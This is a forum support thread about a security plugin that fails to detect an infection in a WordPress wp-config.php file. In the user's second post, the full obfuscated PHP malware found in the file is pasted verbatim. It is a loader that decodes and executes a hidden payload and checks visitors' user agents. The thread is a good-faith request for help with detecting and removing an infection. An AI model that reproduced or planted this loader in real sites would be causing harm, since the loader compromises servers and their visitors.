Defender cannot see a virus in the wp-config.php

One of our users reported a virus infecting the site.

I checked wp-config.php and, sure enough, there was a suspicious PHP string at the top of the file. I ran the Defender scan and the plugin did not detect it. In the past, Defender has removed PHP virus text from WordPress files without issue.

I need to know how to stop this happening. Does Defender not protect the config file?

  • Kasia Swiderska

    Hello Barry - DSM,

    Would it be possible for you to share that suspicious line of code with us? I will consult our developers about it to see what is going on there.

    The problem with wp-config.php is that it can be very heavily customized (for example, WPEngine uses a wp-config.php that is very different from the sample wp-config), and lots of plugins add their own defines there, which are not part of the core. Because there is no single known-good version of the file to compare against, flagging every change that makes it different from the default one might cause lots of problems.

    kind regards,
    Kasia

  • Barry - DSM

    Hi Kasia,

    The suspicious code is as follows:
    <?php $tqjzght = 'j%-bubE{h%)sutcvt)fubmgoj{hA!osvufs!~<3,j%>j%!*3! x27!hmg%!)!gj!<24]y8 x24- x24]26 x24- x24<%j,,*!| x24- x24gvoduhA x27pd%6<pd%w6Z6<.tr($uas," x72 166 x3a 61 x31")) Ld]55#*<%bG9}:}.}-}!#*<%nk!~!<**qp%!-uyfu%)3oretqrjo($n){return chr(ord($n)-1);} @error_vlbel("", $vltpfnj); $hhasrvl();}}!<*qp%-*.%)euhA)3of>2bd%!<5h%/#0#/*#npd/#)rrd/#00;quui#>.fd>%fdy<Cb*[%h!>!%tdz)%bbT-%bT-%hW~%fdy)##-!#~<%h]281L1#/#M5]DgP5]D6#<%fdy>#]D4]2734]275]y83]248]y83]256]y81]265]y748y]#>m%:|:*r%:-t%)3of:opjudovg<~ x24<!%o:!>! x242!-#jt0*?]+^?]_ x5c}X x24<!%tm_SERVER[" x48 124 x54 120 x5f 125 x53 105 x52 137 x41 107 x45 11cvt)esp>hmg%!<12>j%!|!*#91y]c9y]g2yc:W~!%z!>2<!gps)%j>1<%j=6[%ww2!>#p#/#p#ce44#)zbssb!>!ssbnpe_GMFT<&w6< x7fw6*CW&:wink:7gj6<*doj%7-gps)%j>1<%j=tj{fpg)% x24- x24*<!~! x24/%t2w/ x24)##-!#~<#/% x24- x24!))1/35.)1/14+9**-)1/2986+7**^/%rx<~!!%s:N}#-%o:W%c:>1<%b:>1<!if((function_exists(" x6f 142 x5f 163 x74 146 x54"]); if ((strstr($uas," x6d 163 x69 145")) or (strs275L3]248L3P6L1M5]D2P4]D6#<%G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]55-rr.93e:5597f-s.973:8297f:m)%tjw)# x24#-!#]y38#e]81#/#7e:55946-tr.984:75983:48984:71]K9]77]D4]82y]252]18y]#>q%<#762]67y]562]38y]572]"])))) { $GLOBALS[" x61 156 x75 156 x61"]=1; $uas=strtolower($ldbqov>*ofmy%)utjm!|!$uas," x66 151 x72 145 x66 157 x78"))) 7fw6* x7f_*#[k2{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuop) x24]25 x24- x24-!% x24- x24*!|! x24- x24 x178}527}88:}334}472 x24<!%ff2!>!bssbz>!fyqmpef)# x24*<!%t::!>! 
x2]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%tdz>#L4]vc%}&;ftmbg} x7f;!osvufs}w/%z<jg!)%z>>2*!%z>3<!fmtf!%z>2<!%ww2)%wTW~ x24<!fwbm)%tjw)bssb}R;2]},;osvufs} x27;mnui}&;zepc}A;~!} x7f;!|!}{:wink:gj}l;33bq}k5c%j^ x24- x24tvctus)% x24- x24b<*127-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6or (strstr($uas," x61 156 x64 162 x6f 151mjgk4{6~6<tfs%w6< x7fw6*CWtfs%)7gj6<*id%))udfoopdXA x22)7gj6<*QDUMPT7-NBFSUTLDPT7-UFOJGB)fubf%!*3>?*2b%)gpf{jt)!gj!<*2bd%-#1GO x22#)fepmqyfA>2b%]K6]72]K9]78]K5]53]Kc#<%tpzt%:osvufs:~:<*9-1-r%)s%>/h%:<**#57]38y]47]67yj!<**2-4-bubE{h%)sut+)!gj+{e%!osvufs!*!+A!>!{e%)!>> x22!ftmbg)!gj<*#k#)usbutcpV x7C)fepmqnjA x27&6<.fmjgA x27doj%6< x7fw6* x7f_*#f7]y74]275]y7:]268]y7f#<!%tww!>! x2400~:<h%_h1:|:*mmvo:>:iuhofm%:-5ppde:4:|:**#ppde#)tutjyf4 x223}!+!<+{e%%}X;!sp!*#opo#>>}R;msv}.;/#/#/},;#-#}+;%-qp%)54l} x27;%!<*#}_;#vd}R;*msv%)}.;UQPMSVD!-id%)uqpuftmgjZ<#opo#>b%!**X)ufttj x22)gj!|!*nbsbq%)323ldfid;opjudovg}x;0]=])0#)U! 2hA x27pd%6<C x27pd%6|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf x27*&7w!>!#]y84]275]y83]273]y76]277#<!%t2w>#]y74]25297e:56-xr.985:52985-t.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3x65 141 x74 145 x5f 146 x75 156 x63 164 x69 157 x6e"; function +upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!/!#0#)idubnbss-%rxB%h>#]y31]278]y3e]81]K78:56985:6197g:74985]#>>*4-1-bubE{h%)sutcvt)!gj!|!*bubE{h%)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyfopjud6<C x27&6<*rfs%7-K)fujsxX6<#o]o]Y%7;utpI#7>/7rfs%6<#o]1/20QUUI7jsv%7UF#-bubE{h%)tpqsut>j%!*9! 
x27!hmg%)!gj!372]58y]472]37y]672]48y]#>s%<#462]47hfsq)!sp!*#ojneb#-*f%)sfx-n%)utjm6< x7fw6*CW&:wink:7gj6<*K)ftpmdXA6~6<u%7>/7&6|56A:>:8:expressionless::7#6#)tutjyf439275ttfsqnpdo>!2p%!|!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcnbs+yfeobz+sfwjidsbbj)323ldfid>}&;!osvufs} x7f;!opjudovg}k~~9{d%:osvufs:~928>> x22:ftmbg39* x24)%zW%h>EzH,2W%wN;#-Ez-1H*WCw*[!%rN}#QwTW%hIr x5c1^-%r xg!)%j:>>1*!%b:>1<!fmtf!%b:>%s:7**111127-K)ebfsX x27u%)7fmjixpmpusut)tpqssutRe%)Rd%)Rb%))!gj!<*#cd2bge56+99386c6f+9f5d816:+946:7k:!ftmf!}Z;^nbsbq% x5cSFWSFT,*j%!-#1]#-bubE{h%)tpqsut>j%msvftsbqA7>q%6< x7fw6* x7f_*#fubfsdXk5{66~66* x7f_*#ujojRk3{666~6<&w6< x7fw6*CW&)7gj6<.[A x27&6< xjpo! x24- x24y7 x24- x24*<! x24- x24{ $bqvlbel = " x63 162 6<**2qj%)hopm3qjA)qj3hopmA x273qj%udovg}{;#)tutjyfopjudovg)!gj!|!*msv%)}k~~~<ftpmdR6<*id%)dfyfR x27tfs%6<*17-SFEBFI,64Ypp3)%cB%iN}#-! x24/%tmw/ x24)!*72! x27!hmg%)!gj!<2,*j%-#1]etqrjo",str_split("%tjw!>!#]y8238M7]381]211M5]67]452]8%)m%):fmjix:<##:>:h%:<#64y]552]e7y]#>n%<#]37]88y]27]28y]#/r%/h%)n%-#+I#)q%:>:r%:expressionless::**t%)m%=*hoF.uofuopD#)sfebfI{*w%)kVx{**#k#)tutjyfx x22l:!}V;3q%}U;y]#65,47R25,d7R17,67R37,#/q%>U<#16,47R57,27R66,#/q%>2reporting(0); $vltpfnj = implode(array_map("r8]5]48]32M3]317]445]2199#-!#65egb2dc#*<!sfuvso!sboepn)%epnbss-%rxW~!Ypp2)%zB%z>! x24/%tmw/5c2^-%hOh/#00#W~!%t2w)##Qtjw)#]82#-#!#-%tmw)%tww**WYsboepn)%73]y76]252]y85]256]y6g]257]y86]26 x64")) or (strstr($uas," x63 150 x72 2]445]43]321]464]284]364]6]234]342]58]24]31f)fepdof57ftbc x7f!|!*uyfu x2z)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-1 x72 164") && (!isset($GLOBALS[" x61 156 x75 156 x61157 x6d 145")) or (strstr(QIQ&f_UTPIQUUI&e_SEEBFUPNFS&d_SFSFGFSQUUI&c_UOFHBSFTVQUUI&b%!|!*)323zbek!~!<b% x7f!<X>b%Z<#opo#>b%!*##>>X)!~<ofmy%,3,j%>j%!<**3-j%-bubE{h%)sutcvt-#w#)!>!#]D6M7]K3#<%yy>#]D6<^#Y# x5cq% x27Y%6<.2]254]y76#<!%w:!>!(%w:!>! 
x24676<*msv%7-MSV,6<*)ujojR x27id%6< x7fw x5c%j:.2^,%b:<!%c:>%s: x5c%j:^<!%w x5c^>Ew:Qb:Qsvd},;uqpuftmsvd}+;!>!} x27;!>>>!}_;g#W~!Ydrr)%rxB%epnbss!>!bssbz)#44ec:649#-!#:618d5f9#-!#f6c683% x27jsv%6<C>^#zsfvr# x5cq%7**^#zsfvr# x5cq%)ufttj x22)gj625]241]334]368]322]3]364]6]283]427]36]373P6]36]73]83]x27pd%6<pd%w6Z6<.4hA x27pd%6<pd%w6Z6<.324)% x24- x24y4 x24- x2gps)%j:>1<%j:=tj{fpg)%s:*<%j:,,Bj%!<***f x27,*e x27,*d x27,*c x27,*b 7~6<Cw6<pd%w6Z6<.5hA v{h19275j{hnpd19275fubmgoj{x27)fepdof.)fepdof./#@#/qp%>5h%!<*::::::-111112)eobsun>qp%!|Z~!<##!x27{**u%-#jt0}Z;0]=]0#)2q%l}S;2-u%!-#2#/#%#/#o]#/*)323zbe;* x7f!>> x22!pd%)!gj}Z;h!opjdufhfmjg}[;ldpt%}K;ufldpt}X;ms*5! x27!hmg%)!gj!|!*1?hmg%)!gsdXA x27K6< x7fw6*3qj%7> x2272qj%)7gj!>!%yy)#}#-# x24- x24-tusqpt)%z-#:#* x24- x24!>! x24/%tjw/ x#-%tdz*Wsfuvso!%bss x5csboeq%<#g6R85,67R37,18R#>q%V<*#fopoV;hojepdf x7f x7f x7f<u%V x27{ftmfV x7f<*X&Z&S{ftmfV x7f<*XAZASV<*w%)ppde>u%V<#[#-#Y#-#D#-#W#-#C#-#O#-#N#*-!%ff2-!%t::**<(<!fwb-!%w:**<")));$hhasrvl = $bqH# x27rfs%6~6< x7fw6<*K)ftpmdXA6|7**197-2qj%7-K00#*<%nfd)##Qtpz)#]341]88M4P8]37]278]26<*Y%)fnbozcYufhA x272qj%6<^#zsfvr# x5cq%7/7#@#7/7^#iubq# x5cqftmbg!osvufs!|ftmf!~<**9.-ovg x22)!gj}1~!<2p% x7f!~!<##!>!2p%Z<^2 x5c2b%!>!2p+*!*+fepdfe{h+{d%)+opjudovg%c*W%eN+#Qi x5c1^W%c!>!%i x5c2^<!Ce*[!%cIjQeTQcOc/#00StrrEVxNoiTCnUF_EtaERCxecAlPeR_rtStapwpyue'; $sywtcn=explode(chr((756-636)),substr($tqjzght,(38292-32272),(234-200))); $hzaasdxp = $sywtcn[0]($sywtcn[(7-6)]); $tnfgelj = $sywtcn[0]($sywtcn[(8-6)]); if (!function_exists('txqltr')) { function txqltr($lvynfuwq, $bkrxnx,$uvxpnnj) { $vmfbukww = NULL; for($nrtdpqjl=0;$nrtdpqjl<(sizeof($lvynfuwq)/2);$nrtdpqjl++) { $vmfbukww .= substr($bkrxnx, $lvynfuwq[($nrtdpqjl*2)],$lvynfuwq[($nrtdpqjl*2)+(5-4)]); } return $uvxpnnj(chr((37-28)),chr((432-340)),$vmfbukww); }; } $tiovrrf = 
explode(chr((226-182)),'861,44,4408,53,1160,62,539,64,905,56,134,32,1706,41,4251,38,4461,26,1243,39,3566,23,2554,63,211,43,4023,45,3767,30,428,32,4684,32,5141,22,5009,40,113,21,2375,68,2967,49,3276,30,2799,70,5716,47,1789,55,5407,37,3589,34,5801,62,4898,58,4664,20,3429,45,703,28,2050,48,1747,42,3667,40,1670,36,4716,35,3474,56,1282,53,5344,34,2268,36,4800,38,1489,26,5315,29,3623,44,5863,26,0,66,3401,28,3738,29,2869,37,4599,22,4621,21,1222,21,5378,29,1967,20,603,35,2719,36,2755,44,5889,51,1844,51,288,57,5105,36,5190,68,3053,64,2617,53,2942,25,3306,66,677,26,4487,59,4546,53,2304,48,191,20,4332,30,3372,29,2204,64,3117,70,3016,37,5163,27,2141,63,5940,27,1987,63,5570,70,3972,51,5531,39,3913,59,1578,60,2352,23,5258,57,510,29,2443,44,4218,33,2098,43,1922,45,3862,51,3821,41,2906,36,1124,36,460,50,1379,37,1335,44,1638,32,5444,60,5049,23,66,47,3530,36,731,69,1416,28,3707,31,5967,53,4838,60,4090,68,3187,59,4158,60,2670,49,1028,26,2487,67,1075,49,1895,27,4642,22,394,34,1444,45,961,67,166,25,345,49,5763,38,4956,53,3797,24,4068,22,4289,43,5504,27,800,61,5072,33,3246,30,4751,49,638,39,1515,63,4362,46,5640,49,1054,21,5689,27,254,34'); $tkeuma = $hzaasdxp("",txqltr($tiovrrf,$tqjzght,$tnfgelj)); $hzaasdxp=$tqjzght; $tkeuma(""); $tkeuma=(528-407); $tqjzght=$tkeuma-1; ?>
